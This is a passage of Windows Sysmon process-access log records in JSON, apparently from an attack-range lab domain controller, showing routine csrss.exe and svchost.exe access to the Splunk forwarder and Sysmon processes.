{"EventTime":"2020-08-01 05:50:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4111,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:53.617\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-02BD-5F25-0000-001004110600}\r\nTargetProcessId: 4676\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:53.617","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-02BD-5F25-0000-001004110600}","TargetProcessId":"4676","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:50:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4112,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:53.617\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:53.617","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4113,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:53.617\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:53.617","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4114,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:53.617\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:53.617","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4115,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:53.617\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:53.617","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4116,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:53.617\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:53.617","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4117,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:53.617\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:53.617","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4118,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:53.617\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:53.617","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4119,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:53.617\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 